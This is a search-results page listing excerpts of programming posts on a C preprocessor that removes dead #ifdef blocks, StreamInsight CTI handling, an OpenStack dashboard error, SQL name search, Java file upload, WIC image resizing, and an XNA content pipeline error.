Search Results

Search found 27870 results on 1115 pages for 'standard output'.

Page 135/1115 | < Previous Page | 131 132 133 134 135 136 137 138 139 140 141 142  | Next Page >

  • Is there a C pre-processor which eliminates #ifdef blocks based on values defined/undefined?

    - by Jonathan Leffler
    Original Question What I'd like is not a standard C pre-processor, but a variation on it which would accept from somewhere - probably the command line via -DNAME1 and -UNAME2 options - a specification of which macros are defined, and would then eliminate dead code. It may be easier to understand what I'm after with some examples: #ifdef NAME1 #define ALBUQUERQUE "ambidextrous" #else #define PHANTASMAGORIA "ghostly" #endif If the command were run with '-DNAME1', the output would be: #define ALBUQUERQUE "ambidextrous" If the command were run with '-UNAME1', the output would be: #define PHANTASMAGORIA "ghostly" If the command were run with neither option, the output would be the same as the input. This is a simple case - I'd be hoping that the code could handle more complex cases too. To illustrate with a real-world but still simple example: #ifdef USE_VOID #ifdef PLATFORM1 #define VOID void #else #undef VOID typedef void VOID; #endif /* PLATFORM1 */ typedef void * VOIDPTR; #else typedef mint VOID; typedef char * VOIDPTR; #endif /* USE_VOID */ I'd like to run the command with -DUSE_VOID -UPLATFORM1 and get the output: #undef VOID typedef void VOID; typedef void * VOIDPTR; Another example: #ifndef DOUBLEPAD #if (defined NT) || (defined OLDUNIX) #define DOUBLEPAD 8 #else #define DOUBLEPAD 0 #endif /* NT */ #endif /* !DOUBLEPAD */ Ideally, I'd like to run with -UOLDUNIX and get the output: #ifndef DOUBLEPAD #if (defined NT) #define DOUBLEPAD 8 #else #define DOUBLEPAD 0 #endif /* NT */ #endif /* !DOUBLEPAD */ This may be pushing my luck! Motivation: large, ancient code base with lots of conditional code. Many of the conditions no longer apply - the OLDUNIX platform, for example, is no longer made and no longer supported, so there is no need to have references to it in the code. Other conditions are always true. For example, features are added with conditional compilation so that a single version of the code can be used for both older versions of the software where the feature is not available and newer versions where it is available (more or less). Eventually, the old versions without the feature are no longer supported - everything uses the feature - so the condition on whether the feature is present or not should be removed, and the 'when feature is absent' code should be removed too. I'd like to have a tool to do the job automatically because it will be faster and more reliable than doing it manually (which is rather critical when the code base includes 21,500 source files). (A really clever version of the tool might read #include'd files to determine whether the control macros - those specified by -D or -U on the command line - are defined in those files. I'm not sure whether that's truly helpful except as a backup diagnostic. Whatever else it does, though, the pseudo-pre-processor must not expand macros or include files verbatim. The output must be source similar to, but usually simpler than, the input code.) Status Report (one year later) After a year of use, I am very happy with 'sunifdef' recommended by the selected answer. It hasn't made a mistake yet, and I don't expect it to. The only quibble I have with it is stylistic. Given an input such as: #if (defined(A) && defined(B)) || defined(C) || (defined(D) && defined(E)) and run with '-UC' (C is never defined), the output is: #if defined(A) && defined(B) || defined(D) && defined(E) This is technically correct because '&&' binds tighter than '||', but it is an open invitation to confusion. I would much prefer it to include parentheses around the sets of '&&' conditions, as in the original: #if (defined(A) && defined(B)) || (defined(D) && defined(E)) However, given the obscurity of some of the code I have to work with, for that to be the biggest nit-pick is a strong compliment; it is valuable tool to me. The New Kid on the Block Having checked the URL for inclusion in the information above, I see that (as predicted) there is an new program called Coan that is the successor to 'sunifdef'. It is available on SourceForge and has been since January 2010. I'll be checking it out...further reports later this year, or maybe next year, or sometime, or never.

    Read the article

  • Issuing Current Time Increments in StreamInsight (A Practical Example)

    The issuing of a Current Time Increment, Cti, in StreamInsight is very definitely one of the most important concepts to learn if you want your Streams to be responsive. A full discussion of how to issue Ctis is beyond the scope of this article but a very good explanation in addition to Books Online can be found in these three articles by a member of the StreamInsight team at Microsoft, Ciprian Gerea. Time in StreamInsight Series http://blogs.msdn.com/b/streaminsight/archive/2010/07/23/time-in-streaminsight-i.aspx http://blogs.msdn.com/b/streaminsight/archive/2010/07/30/time-in-streaminsight-ii.aspx http://blogs.msdn.com/b/streaminsight/archive/2010/08/03/time-in-streaminsight-iii.aspx A lot of the problems I see with unresponsive or stuck streams on the MSDN Forums are to do with how Ctis are enqueued or in a lot of cases not enqueued. If you enqueue events and never enqueue a Cti then StreamInsight will be perfectly happy. You, on the other hand, will never see data on the output as you have not told StreamInsight to flush the stream. This article deals with a specific implementation problem I had recently whilst working on a StreamInsight project. I look at some possible options and discuss why they would not work before showing the way I solved the problem. The stream of data I was dealing with on this project was very bursty that is to say when events were flowing they came through very quickly and in large numbers (1000 events/sec), but when the stream calmed down it could be a few seconds between each event. When enqueuing events into the StreamInsight engne it is best practice to do so with a StartTime that is given to you by the system producing the event . StreamInsight processes events and it doesn't matter whether those events are being pushed into the engine by a source system or the events are being read from something like a flat file in a directory somewhere. You can apply the same logic and temporal algebra to both situations. Reading from a file is an excellent example of where the time of the event on the source itself is very important. We could be reading that file a long time after it was written. Being able to read the StartTime from the events allows us to define windows that will hold the correct sets of events. I was able to do this with my stream but this is where my problems started. Below is a very simple script to create a SQL Server table and populate it with sample data that will show exactly the problem I had. CREATE TABLE [dbo].[t] ( [c1] [int] PRIMARY KEY, [c2] [datetime] NULL ) INSERT t VALUES (1,'20100810'),(2,'20100810'),(3,'20100810') Column c2 defines the StartTime of the event on the source and as you can see the values in all 3 rows of data is the same. If we read Ciprian’s articles we know that we can define how Ctis get injected into the stream in 3 different places The Stream Definition The Input Factory The Input Adapter I personally have always been a fan of enqueing Ctis through the factory. Below is code typical of what I would use to do this On the class itself I do some inheriting public class SimpleInputFactory : ITypedInputAdapterFactory<SimpleInputConfig>, ITypedDeclareAdvanceTimeProperties<SimpleInputConfig> And then I implement the following function public AdapterAdvanceTimeSettings DeclareAdvanceTimeProperties<TPayload>(SimpleInputConfig configInfo, EventShape eventShape) { return new AdapterAdvanceTimeSettings( new AdvanceTimeGenerationSettings(configInfo.CtiFrequency, TimeSpan.FromTicks(-1)), AdvanceTimePolicy.Adjust); } The configInfo .CtiFrequency property is a value I pass through to define after how many events I want a Cti to be injected and this in turn will flush through the stream of data. I usually pass a value of 1 for this setting. The second parameter determines the CTI timestamp in terms of a delay relative to the events. -1 ticks in the past results in 1 tick in the future, i.e., ahead of the event. The problem with this method though is that if consecutive events have the same StartTime then only one of those events will be enqueued. In this example I use the following to define how I assign the StartTime of my events currEvent.StartTime = (DateTimeOffset)dt.c2; If I go ahead and run my StreamInsight process with this configuration i can see on the output adapter that two events have been removed To see this in a little more depth I can use the StreamInsight Debugger and see what happens internally. What is happening here is that the first event arrives and a Cti is injected with a time of 1 tick after the StartTime of that event (Also the EndTime of the event). The second event arrives and it has a StartTime of before the Cti and even though we specified AdvanceTimePolicy.Adjust on the factory we know that a point event can never be adjusted like this and the event is dropped. The same happens for the third event as well (The second and third events get trumped by the Cti). For a more detailed discussion of why this happens look here http://www.sqlis.com/sqlis/post/AdvanceTimePolicy-and-Point-Event-Streams-In-StreamInsight.aspx We end up with a single event being pushed into the output adapter and our result now makes sense. The next way I tried to solve this problem by changing the value of the second parameter to TimeSpan.Zero Here is how my factory code now looks public AdapterAdvanceTimeSettings DeclareAdvanceTimeProperties<TPayload>(SimpleInputConfig configInfo, EventShape eventShape) { return new AdapterAdvanceTimeSettings( new AdvanceTimeGenerationSettings(configInfo.CtiFrequency, TimeSpan.Zero), AdvanceTimePolicy.Adjust); } What I am doing here is declaring a policy that says inject a Cti together with every event and stamp it with a StartTime that is equal to the start time of the event itself (TimeSpan.Zero). This method has plus points as well as a downside. The upside is that no events will be lost by having the same StartTime as previous events. The Downside is that because the Cti is declared with the StartTime of the event itself then it does not actually flush that particular event because in the StreamInsight algebra, a Cti commits only those events that occurred strictly before them. To flush the events we need a Cti to be enqueued with a greater StartTime than the events themselves. Here is what happened when I ran this configuration As you can see all we got through was the Cti and none of the events. The debugger output shows the stamps on the Cti and the events themselves. Because the Cti issued has the same timestamp (StartTime) as the events then none of the events get flushed. I was nearly there but not quite. Because my stream was bursty it was possible that the next event would not come along for a few seconds and this was far too long for an event to be enqueued and not be flushed to the output adapter. I needed another solution. Two possible solutions crossed my mind although only one of them made sense when I explored it some more. Where multiple events have the same StartTime I could add 1 tick to the first event, two to the second, three to third etc thereby giving them unique StartTime values. Add a timer to manually inject Ctis The problem with the first implementation is that I would be giving the events a new StartTime. This would cause me the following problems If I want to define windows over the stream then some events may not be captured in the right windows and therefore any calculations on those windows I did would be wrong What would happen if we had 10,000 events with the same StartTime? I would enqueue them with StartTime + n ticks. Along comes a genuine event with a StartTime of the very first event + 1 tick. It is now too far in the past as far as my stream is concerned and it would be dropped. Not what I would want to do at all. I decided then to look at the Timer based solution I created a timer on my input adapter that elapsed every 200ms. private Timer tmr; public SimpleInputAdapter(SimpleInputConfig configInfo) { ctx = new SimpleTimeExtractDataContext(configInfo.ConnectionString); this.configInfo = configInfo; tmr = new Timer(200); tmr.Elapsed += new ElapsedEventHandler(t_Elapsed); tmr.Enabled = true; } void t_Elapsed(object sender, ElapsedEventArgs e) { ts = DateTime.Now - dtCtiIssued; if (ts.TotalMilliseconds >= 200 && TimerIssuedCti == false) { EnqueueCtiEvent(System.DateTime.Now.AddTicks(-100)); TimerIssuedCti = true; } }   In the t_Elapsed event handler I find out the difference in time between now and when the last event was processed (dtCtiIssued). I then check to see if that is greater than or equal to 200ms and if the last issuing of a Cti was done by the timer or by a genuine event (TimerIssuedCti). If I didn’t do this check then I would enqueue a Cti every time the timer elapsed which is not something I wanted. If the difference between the two times is greater than or equal to 500ms and the last event enqueued was by a real event then I issue a Cti through the timer to flush the event Queue, otherwise I do nothing. When I enqueue the Ctis into my stream in my ProduceEvents method I also set the values of dtCtiIssued and TimerIssuedCti   currEvent = CreateInsertEvent(); currEvent.StartTime = (DateTimeOffset)dt.c2; TimerIssuedCti = false; dtCtiIssued = currEvent.StartTime; If I go ahead and run this configuration I see the following in my output. As we can see the first Cti gets enqueued as before but then another is enqueued by the timer and because this has a later timestamp it flushes the enqueued events through the engine. Conclusion Hopefully this has shown how the enqueuing of Ctis can have a dramatic effect on the responsiveness of your output in StreamInsight. Understanding the temporal nature of the product is for me one of the most important things you can learn. I have attached my solution for the demos. It is all in one project and testing each variation is a simple matter of commenting and un-commenting the parts in the code we have been dealing with here.

    Read the article

  • installed openstack using devstack install shell script but getting 500 error when i try opening dashboard

    - by Arvind
    I followed the instructions at http://devstack.org/guides/single-machine.html to install OpenStack. I first installed Ubuntu on my Windows 7 PC using the officially supported Windows installer for Ubuntu 12.04 LTS. And after that I followed the instructions at above page to install OpenStack. As per instructions, I should be able to access the dashboard aka Horizon, at http://192.168.1.4/ (thats the IP of the PC on which I installed Ubuntu-OpenStack). However I am getting a 500 error web page when I open that. How do I resolve this error? I want to set up a dev environment for OpenStack. For your ref, the whole error message is given now-- FilterError at / /usr/bin/env: node: No such file or directory Request Method: GET Request URL: http://192.168.1.4/ Django Version: 1.4.2 Exception Type: FilterError Exception Value: /usr/bin/env: node: No such file or directory Exception Location: /usr/local/lib/python2.7/dist-packages/compressor/filters/base.py in input, line 133 Python Executable: /usr/bin/python Python Version: 2.7.3 Python Path: ['/opt/stack/horizon/openstack_dashboard/wsgi/../..', '/opt/stack/python-keystoneclient', '/opt/stack/python-novaclient', '/opt/stack/python-openstackclient', '/opt/stack/keystone', '/opt/stack/glance', '/opt/stack/python-glanceclient/setuptools_git-0.4.2-py2.7.egg', '/opt/stack/python-glanceclient', '/opt/stack/nova', '/opt/stack/horizon', '/opt/stack/cinder', '/opt/stack/python-cinderclient', '/usr/local/lib/python2.7/dist-packages', '/usr/lib/python2.7', '/usr/lib/python2.7/plat-linux2', '/usr/lib/python2.7/lib-tk', '/usr/lib/python2.7/lib-old', '/usr/lib/python2.7/lib-dynload', '/usr/lib/python2.7/dist-packages', '/usr/lib/python2.7/dist-packages/PIL', '/usr/lib/python2.7/dist-packages/gst-0.10', '/usr/lib/python2.7/dist-packages/gtk-2.0', '/usr/lib/pymodules/python2.7', '/usr/lib/python2.7/dist-packages/ubuntu-sso-client', '/usr/lib/python2.7/dist-packages/ubuntuone-client', '/usr/lib/python2.7/dist-packages/ubuntuone-control-panel', '/usr/lib/python2.7/dist-packages/ubuntuone-couch', '/usr/lib/python2.7/dist-packages/ubuntuone-storage-protocol', '/opt/stack/horizon/openstack_dashboard'] Server time: Sat, 27 Oct 2012 08:43:29 +0000 Error during template rendering In template /opt/stack/horizon/openstack_dashboard/templates/_stylesheets.html, error at line 3 /usr/bin/env: node: No such file or directory 1 {% load compress %} 2 3 {% compress css %} 4 <link href='{{ STATIC_URL }}dashboard/less/horizon.less' type='text/less' media='screen' rel='stylesheet' /> 5 {% endcompress %} 6 7 <link rel="shortcut icon" href="{{ STATIC_URL }}dashboard/img/favicon.ico"/> 8 Also, the traceback is now given below-- Environment: Request Method: GET Request URL: http://192.168.1.4/ Django Version: 1.4.2 Python Version: 2.7.3 Installed Applications: ('openstack_dashboard', 'django.contrib.contenttypes', 'django.contrib.auth', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'django.contrib.humanize', 'compressor', 'horizon', 'openstack_dashboard.dashboards.project', 'openstack_dashboard.dashboards.admin', 'openstack_dashboard.dashboards.settings', 'openstack_auth') Installed Middleware: ('django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'horizon.middleware.HorizonMiddleware', 'django.middleware.doc.XViewMiddleware', 'django.middleware.locale.LocaleMiddleware') Template error: In template /opt/stack/horizon/openstack_dashboard/templates/_stylesheets.html, error at line 3 /usr/bin/env: node: No such file or directory 1 : {% load compress %} 2 : 3 : {% compress css %} 4 : <link href='{{ STATIC_URL }}dashboard/less/horizon.less' type='text/less' media='screen' rel='stylesheet' /> 5 : {% endcompress %} 6 : 7 : <link rel="shortcut icon" href="{{ STATIC_URL }}dashboard/img/favicon.ico"/> 8 : Traceback: File "/usr/local/lib/python2.7/dist-packages/django/core/handlers/base.py" in get_response 111. response = callback(request, *callback_args, **callback_kwargs) File "/usr/local/lib/python2.7/dist-packages/django/views/decorators/vary.py" in inner_func 36. response = func(*args, **kwargs) File "/opt/stack/horizon/openstack_dashboard/wsgi/../../openstack_dashboard/views.py" in splash 38. return shortcuts.render(request, 'splash.html', {'form': form}) File "/usr/local/lib/python2.7/dist-packages/django/shortcuts/__init__.py" in render 44. return HttpResponse(loader.render_to_string(*args, **kwargs), File "/usr/local/lib/python2.7/dist-packages/django/template/loader.py" in render_to_string 176. return t.render(context_instance) File "/usr/local/lib/python2.7/dist-packages/django/template/base.py" in render 140. return self._render(context) File "/usr/local/lib/python2.7/dist-packages/django/template/base.py" in _render 134. return self.nodelist.render(context) File "/usr/local/lib/python2.7/dist-packages/django/template/base.py" in render 823. bit = self.render_node(node, context) File "/usr/local/lib/python2.7/dist-packages/django/template/debug.py" in render_node 74. return node.render(context) File "/usr/local/lib/python2.7/dist-packages/django/template/loader_tags.py" in render 155. return self.render_template(self.template, context) File "/usr/local/lib/python2.7/dist-packages/django/template/loader_tags.py" in render_template 137. output = template.render(context) File "/usr/local/lib/python2.7/dist-packages/django/template/base.py" in render 140. return self._render(context) File "/usr/local/lib/python2.7/dist-packages/django/template/base.py" in _render 134. return self.nodelist.render(context) File "/usr/local/lib/python2.7/dist-packages/django/template/base.py" in render 823. bit = self.render_node(node, context) File "/usr/local/lib/python2.7/dist-packages/django/template/debug.py" in render_node 74. return node.render(context) File "/usr/local/lib/python2.7/dist-packages/compressor/templatetags/compress.py" in render 147. return self.render_compressed(context, self.kind, self.mode, forced=forced) File "/usr/local/lib/python2.7/dist-packages/compressor/templatetags/compress.py" in render_compressed 107. rendered_output = self.render_output(compressor, mode, forced=forced) File "/usr/local/lib/python2.7/dist-packages/compressor/templatetags/compress.py" in render_output 119. return compressor.output(mode, forced=forced) File "/usr/local/lib/python2.7/dist-packages/compressor/css.py" in output 51. ret.append(subnode.output(*args, **kwargs)) File "/usr/local/lib/python2.7/dist-packages/compressor/css.py" in output 53. return super(CssCompressor, self).output(*args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/compressor/base.py" in output 230. content = self.filter_input(forced) File "/usr/local/lib/python2.7/dist-packages/compressor/base.py" in filter_input 192. for hunk in self.hunks(forced): File "/usr/local/lib/python2.7/dist-packages/compressor/base.py" in hunks 167. precompiled, value = self.precompile(value, **options) File "/usr/local/lib/python2.7/dist-packages/compressor/base.py" in precompile 210. command=command, filename=filename).input(**kwargs) File "/usr/local/lib/python2.7/dist-packages/compressor/filters/base.py" in input 133. raise FilterError(err) Exception Type: FilterError at / Exception Value: /usr/bin/env: node: No such file or directory

    Read the article

  • Filter rows on the basis of "First Name" + "Last Name" in SQL

    - by Raghav Khunger
    Hi, I have a user table in my database which contains two columns FirstName and LastName. Now in my front end there is a textbox to filter out the users from this table. Let's suppose I am taking that input from the front end in the form of a input parameter "@SEARCHKEYWORD". I have created a sample below: DECLARE @Test TABLE ([ID] INT IDENTITY, [FNAME] NVARCHAR(100), [LNAME] NVARCHAR(100) ) INSERT INTO @Test( FNAME, LNAME ) SELECT 'John','Resig' UNION ALL SELECT 'Dave','Ward' UNION ALL SELECT 'Peter','Smith' UNION ALL SELECT 'Dave','Smith' UNION ALL SELECT 'Girija','Acharya' UNION ALL SELECT 'Devendra', 'Gujel' UNION ALL SELECT 'Arjit', 'Gupta' DECLARE @SEARCHKEYWORD NVARCHAR(100) SELECT * FROM @Test WHERE FNAME +' '+ LNAME LIKE @SEARCHKEYWORD i.e. so far I have thought of this query to filter out the rows but it is not giving the desired results: SELECT * FROM @Test WHERE FNAME +' '+ LNAME LIKE @SEARCHKEYWORD Here are the desired outputs which I needed for the inputs mentioned below: --WHEN @SEARCHKEYWORD='John Resig' --Desired OUTPUT: the row which contains 'John','Resig' --WHEN @SEARCHKEYWORD='Ac' --Desired OUTPUT: the row which contains 'Girija','Acharya' --WHEN @SEARCHKEYWORD='Smith' --Desired OUTPUT: the row which contains 'Peter','Smith' and 'Dave','Smith' --WHEN @SEARCHKEYWORD='g' --Desired OUTPUT: the row which contains 'Devendra', 'Gujel' and 'Arjit', 'Gupta' --WHEN @SEARCHKEYWORD='Smith' --Desired OUTPUT: the row which contains 'Peter','Smith' and 'Dave','Smith'

    Read the article

  • Does writing data to server using Java URL class require response from server?

    - by gigadot
    I am trying to upload files using Java URL class and I have found a previous question on stack-overflow which explains very well about the details, so I try to follow it. And below is my code adopted from the sniplet given in the answer. My problem is that if I don't make a call to one of connection.getResponseCode() or connection.getInputStream() or connection.getResponseMessage() or anything which is related to reponse from the server, the request will never be sent to server. Why do I need to do this? Or is there any way to write the data without getting the response? P.S. I have developed a server-side uploading servlet which accepts multipart/form-data and save it to files using FileUpload. It is stable and definitely working without any problem so this is not where my problem is generated. import java.io.Closeable; import java.io.File; import java.io.FileInputStream; import java.io.IOException; import java.io.OutputStream; import java.io.PrintWriter; import java.net.HttpURLConnection; import java.net.URL; import org.apache.commons.io.IOUtils; public class URLUploader { public static void closeQuietly(Closeable... objs) { for (Closeable closeable : objs) { IOUtils.closeQuietly(closeable); } } public static void main(String[] args) throws IOException { File textFile = new File("D:\\file.zip"); String boundary = Long.toHexString(System.currentTimeMillis()); // Just generate some unique random value. HttpURLConnection connection = (HttpURLConnection) new URL("http://localhost:8080/upslet/upload").openConnection(); connection.setDoOutput(true); connection.setRequestProperty("Content-Type", "multipart/form-data; boundary=" + boundary); OutputStream output = output = connection.getOutputStream(); PrintWriter writer = writer = new PrintWriter(output, true); // Send text file. writer.println("--" + boundary); writer.println("Content-Disposition: form-data; name=\"file1\"; filename=\"" + textFile.getName() + "\""); writer.println("Content-Type: application/octet-stream"); FileInputStream fin = new FileInputStream(textFile); writer.println(); IOUtils.copy(fin, output); writer.println(); // End of multipart/form-data. writer.println("--" + boundary + "--"); output.flush(); closeQuietly(fin, writer, output); // Above request will never be sent if .getInputStream() or .getResponseCode() or .getResponseMessage() does not get called. connection.getResponseCode(); } }

    Read the article

  • Detect a white square in a black and white image

    - by gcc
    I saw that question i one web site (cite name like that programm.) then i tried to solve but icannot (not my and myfriend homework ) how can i approach to that one (in program.net no solution there is ) Read black & white image data from standard input, and detect a white square in the image. Output the coordinates of the upper left corner of the square, and the width of the square. In the preliminary work, you can print the output and terminate your program after you detect your first square. If you can't find any square on the image, you will print the string: "NO DETECTION". Input (which represents a 2 by 2 square in the center of a 5 by 4 image): 2 2 5 4 0 0 0 0 0 0 0 255 255 0 0 0 255 255 0 0 0 0 0 0 Output: 3 2 2 Input (more comprehensible format of the image, with the same output): 2 6 4 000 000 000 000 000 000 000 000 255 255 255 000 000 000 000 255 255 000 000 000 000 000 000 000 Output: no detection Input can be: 000 255 255 000 000 000 000 255 255 000 000 000 000 000 000 000 000 000 000 000 000 000 000 000 000 000 255 255 255 000 000 000 255 255 255 000 000 000 255 255 255 000 000 000 000 000 000 000 If there are two squares detected, we should use the biggest one

    Read the article

  • The fastest way to resize images from ASP.NET. And it’s (more) supported-ish.

    - by Bertrand Le Roy
    I’ve shown before how to resize images using GDI, which is fairly common but is explicitly unsupported because we know of very real problems that this can cause. Still, many sites still use that method because those problems are fairly rare, and because most people assume it’s the only way to get the job done. Plus, it works in medium trust. More recently, I’ve shown how you can use WPF APIs to do the same thing and get JPEG thumbnails, only 2.5 times faster than GDI (even now that GDI really ultimately uses WIC to read and write images). The boost in performance is great, but it comes at a cost, that you may or may not care about: it won’t work in medium trust. It’s also just as unsupported as the GDI option. What I want to show today is how to use the Windows Imaging Components from ASP.NET APIs directly, without going through WPF. The approach has the great advantage that it’s been tested and proven to scale very well. The WIC team tells me you should be able to call support and get answers if you hit problems. Caveats exist though. First, this is using interop, so until a signed wrapper sits in the GAC, it will require full trust. Second, the APIs have a very strong smell of native code and are definitely not .NET-friendly. And finally, the most serious problem is that older versions of Windows don’t offer MTA support for image decoding. MTA support is only available on Windows 7, Vista and Windows Server 2008. But on 2003 and XP, you’ll only get STA support. that means that the thread safety that we so badly need for server applications is not guaranteed on those operating systems. To make it work, you’d have to spin specialized threads yourself and manage the lifetime of your objects, which is outside the scope of this article. We’ll assume that we’re fine with al this and that we’re running on 7 or 2008 under full trust. Be warned that the code that follows is not simple or very readable. This is definitely not the easiest way to resize an image in .NET. Wrapping native APIs such as WIC in a managed wrapper is never easy, but fortunately we won’t have to: the WIC team already did it for us and released the results under MS-PL. The InteropServices folder, which contains the wrappers we need, is in the WicCop project but I’ve also included it in the sample that you can download from the link at the end of the article. In order to produce a thumbnail, we first have to obtain a decoding frame object that WIC can use. Like with WPF, that object will contain the command to decode a frame from the source image but won’t do the actual decoding until necessary. Getting the frame is done by reading the image bytes through a special WIC stream that you can obtain from a factory object that we’re going to reuse for lots of other tasks: var photo = File.ReadAllBytes(photoPath); var factory = (IWICComponentFactory)new WICImagingFactory(); var inputStream = factory.CreateStream(); inputStream.InitializeFromMemory(photo, (uint)photo.Length); var decoder = factory.CreateDecoderFromStream( inputStream, null, WICDecodeOptions.WICDecodeMetadataCacheOnLoad); var frame = decoder.GetFrame(0); We can read the dimensions of the frame using the following (somewhat ugly) code: uint width, height; frame.GetSize(out width, out height); This enables us to compute the dimensions of the thumbnail, as I’ve shown in previous articles. We now need to prepare the output stream for the thumbnail. WIC requires a special kind of stream, IStream (not implemented by System.IO.Stream) and doesn’t directlyunderstand .NET streams. It does provide a number of implementations but not exactly what we need here. We need to output to memory because we’ll want to persist the same bytes to the response stream and to a local file for caching. The memory-bound version of IStream requires a fixed-length buffer but we won’t know the length of the buffer before we resize. To solve that problem, I’ve built a derived class from MemoryStream that also implements IStream. The implementation is not very complicated, it just delegates the IStream methods to the base class, but it involves some native pointer manipulation. Once we have a stream, we need to build the encoder for the output format, which could be anything that WIC supports. For web thumbnails, our only reasonable options are PNG and JPEG. I explored PNG because it’s a lossless format, and because WIC does support PNG compression. That compression is not very efficient though and JPEG offers good quality with much smaller file sizes. On the web, it matters. I found the best PNG compression option (adaptive) to give files that are about twice as big as 100%-quality JPEG (an absurd setting), 4.5 times bigger than 95%-quality JPEG and 7 times larger than 85%-quality JPEG, which is more than acceptable quality. As a consequence, we’ll use JPEG. The JPEG encoder can be prepared as follows: var encoder = factory.CreateEncoder( Consts.GUID_ContainerFormatJpeg, null); encoder.Initialize(outputStream, WICBitmapEncoderCacheOption.WICBitmapEncoderNoCache); The next operation is to create the output frame: IWICBitmapFrameEncode outputFrame; var arg = new IPropertyBag2[1]; encoder.CreateNewFrame(out outputFrame, arg); Notice that we are passing in a property bag. This is where we’re going to specify our only parameter for encoding, the JPEG quality setting: var propBag = arg[0]; var propertyBagOption = new PROPBAG2[1]; propertyBagOption[0].pstrName = "ImageQuality"; propBag.Write(1, propertyBagOption, new object[] { 0.85F }); outputFrame.Initialize(propBag); We can then set the resolution for the thumbnail to be 96, something we weren’t able to do with WPF and had to hack around: outputFrame.SetResolution(96, 96); Next, we set the size of the output frame and create a scaler from the input frame and the computed dimensions of the target thumbnail: outputFrame.SetSize(thumbWidth, thumbHeight); var scaler = factory.CreateBitmapScaler(); scaler.Initialize(frame, thumbWidth, thumbHeight, WICBitmapInterpolationMode.WICBitmapInterpolationModeFant); The scaler is using the Fant method, which I think is the best looking one even if it seems a little softer than cubic (zoomed here to better show the defects): Cubic Fant Linear Nearest neighbor We can write the source image to the output frame through the scaler: outputFrame.WriteSource(scaler, new WICRect { X = 0, Y = 0, Width = (int)thumbWidth, Height = (int)thumbHeight }); And finally we commit the pipeline that we built and get the byte array for the thumbnail out of our memory stream: outputFrame.Commit(); encoder.Commit(); var outputArray = outputStream.ToArray(); outputStream.Close(); That byte array can then be sent to the output stream and to the cache file. Once we’ve gone through this exercise, it’s only natural to wonder whether it was worth the trouble. I ran this method, as well as GDI and WPF resizing over thirty twelve megapixel images for JPEG qualities between 70% and 100% and measured the file size and time to resize. Here are the results: Size of resized images   Time to resize thirty 12 megapixel images Not much to see on the size graph: sizes from WPF and WIC are equivalent, which is hardly surprising as WPF calls into WIC. There is just an anomaly for 75% for WPF that I noted in my previous article and that disappears when using WIC directly. But overall, using WPF or WIC over GDI represents a slight win in file size. The time to resize is more interesting. WPF and WIC get similar times although WIC seems to always be a little faster. Not surprising considering WPF is using WIC. The margin of error on this results is probably fairly close to the time difference. As we already knew, the time to resize does not depend on the quality level, only the size does. This means that the only decision you have to make here is size versus visual quality. This third approach to server-side image resizing on ASP.NET seems to converge on the fastest possible one. We have marginally better performance than WPF, but with some additional peace of mind that this approach is sanctioned for server-side usage by the Windows Imaging team. It still doesn’t work in medium trust. That is a problem and shows the way for future server-friendly managed wrappers around WIC. The sample code for this article can be downloaded from: http://weblogs.asp.net/blogs/bleroy/Samples/WicResize.zip The benchmark code can be found here (you’ll need to add your own images to the Images directory and then add those to the project, with content and copy if newer in the properties of the files in the solution explorer): http://weblogs.asp.net/blogs/bleroy/Samples/WicWpfGdiImageResizeBenchmark.zip WIC tools can be downloaded from: http://code.msdn.microsoft.com/wictools To conclude, here are some of the resized thumbnails at 85% fant:

    Read the article

  • Custom Content Pipeline with Automatic Serialization Load Error

    - by Direweasel
    I'm running into this error: Error loading "desert". Cannot find type TiledLib.MapContent, TiledLib, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null. at Microsoft.Xna.Framework.Content.ContentTypeReaderManager.InstantiateTypeReader(String readerTypeName, ContentReader contentReader, ContentTypeReader& reader) at Microsoft.Xna.Framework.Content.ContentTypeReaderManager.GetTypeReader(String readerTypeName, ContentReader contentReader, List1& newTypeReaders) at Microsoft.Xna.Framework.Content.ContentTypeReaderManager.ReadTypeManifest(Int32 typeCount, ContentReader contentReader) at Microsoft.Xna.Framework.Content.ContentReader.ReadHeader() at Microsoft.Xna.Framework.Content.ContentReader.ReadAsset[T]() at Microsoft.Xna.Framework.Content.ContentManager.ReadAsset[T](String assetName, Action1 recordDisposableObject) at Microsoft.Xna.Framework.Content.ContentManager.Load[T](String assetName) at TiledTest.Game1.LoadContent() in C:\My Documents\Dropbox\Visual Studio Projects\TiledTest\TiledTest\TiledTest\Game1.cs:line 51 at Microsoft.Xna.Framework.Game.Initialize() at TiledTest.Game1.Initialize() in C:\My Documents\Dropbox\Visual Studio Projects\TiledTest\TiledTest\TiledTest\Game1.cs:line 39 at Microsoft.Xna.Framework.Game.RunGame(Boolean useBlockingRun) at Microsoft.Xna.Framework.Game.Run() at TiledTest.Program.Main(String[] args) in C:\My Documents\Dropbox\Visual Studio Projects\TiledTest\TiledTest\TiledTest\Program.cs:line 15 When trying to run the game. This is a basic demo to try and utilize a separate project library called TiledLib. I have four projects overall: TiledLib (C# Class Library) TiledTest (Windows Game) TiledTestContent (Content) TMX CP Ext (Content Pipeline Extension Library) TiledLib contains MapContent which is throwing the error, however I believe this may just be a generic error with a deeper root problem. EMX CP Ext contains one file: MapProcessor.cs using System; using System.Collections.Generic; using System.Linq; using Microsoft.Xna.Framework; using Microsoft.Xna.Framework.Graphics; using Microsoft.Xna.Framework.Content.Pipeline; using Microsoft.Xna.Framework.Content.Pipeline.Graphics; using Microsoft.Xna.Framework.Content.Pipeline.Processors; using Microsoft.Xna.Framework.Content; using TiledLib; namespace TMX_CP_Ext { // Each tile has a texture, source rect, and sprite effects. [ContentSerializerRuntimeType("TiledTest.Tile, TiledTest")] public class DemoMapTileContent { public ExternalReference<Texture2DContent> Texture; public Rectangle SourceRectangle; public SpriteEffects SpriteEffects; } // For each layer, we store the size of the layer and the tiles. [ContentSerializerRuntimeType("TiledTest.Layer, TiledTest")] public class DemoMapLayerContent { public int Width; public int Height; public DemoMapTileContent[] Tiles; } // For the map itself, we just store the size, tile size, and a list of layers. [ContentSerializerRuntimeType("TiledTest.Map, TiledTest")] public class DemoMapContent { public int TileWidth; public int TileHeight; public List<DemoMapLayerContent> Layers = new List<DemoMapLayerContent>(); } [ContentProcessor(DisplayName = "TMX Processor - TiledLib")] public class MapProcessor : 